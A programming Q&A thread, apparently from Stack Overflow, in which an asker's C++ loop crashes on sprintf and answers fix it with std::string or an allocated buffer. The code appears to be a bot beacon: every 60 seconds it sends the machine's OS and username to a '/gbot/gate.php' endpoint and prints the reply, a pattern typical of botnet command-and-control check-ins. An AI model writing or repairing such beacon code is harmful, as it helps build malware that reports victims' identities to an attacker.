# C++ code about GET and sprintf

Tags: c++, get

```
while(true)
{
    char *mybuf;
    if(getenv("windir") != NULL)
    {
        //mybuf = "GET /gbot/gate.php?page=ident&os=windows&username=%s\r\n\r\n";
        sprintf(mybuf, "GET /gbot/gate.php?page=ident&os=windows&username=%s\r\n\r\n", getenv("username"));
    }
    else
        mybuf = "GET /gbot/gate.php?page=ident&os=linux\r\n\r\n";
    send(Socket, mybuf, strlen(mybuf), 0);
    char buffer[10000];
    recv(Socket, buffer, 10000,0);
    cout << buffer;
    _sleep(60000);
}
```

I have this code and sprintf crashes the program.
How can I make mybuf, contain the username (getenv), without crashing my project?
Thans a lot.

Comment: You'd probably get a warning (more than one) if you turned them on.

Answer (score 2, accepted):

Unless you *really* want to create yet another problem with buffer overflow, don't use `sprintf` at all. Since you've tagged this C++, I'd advise something more like:

```
std::string mybuf("GET /gbot/gate.php?page=ident&os=");

if(getenv("windir") != NULL) {
    mybuf += "windows&username=";
    mybuf += getenv("username");
    mybuf += "\r\n\r\n";
}
else
    mybuf += "linux\r\n\r\n";

send(Socket, mybuf.c_str(), mybuf.length(), 0);
```

Comment: I dont get any response from the web in that way. any idea why?

Comment: @user2263821: Don't know offhand -- it should be doing about the same as the code you had was trying to. Might try printing out `mybuf` to see what you're getting.

Answer (score 2):

`char *mybuf` just gives you a `char` pointer and nothing else. You need to actually allocate the `char` buffer so that `sprintf` has some place to write its result to. Try making it an array instead (to avoid doing manual memory management):

```
char mybuf[SIZE];
```

Replace `SIZE` with whatever you want the size of the buffer to be.

However, I worry that you think you're writing C++. This looks a lot more like C.

Comment: And use `snprintf` instead of `sprintf` to avoid overflowing the buffer.

Comment: @jamesdlin Yes, that too! :D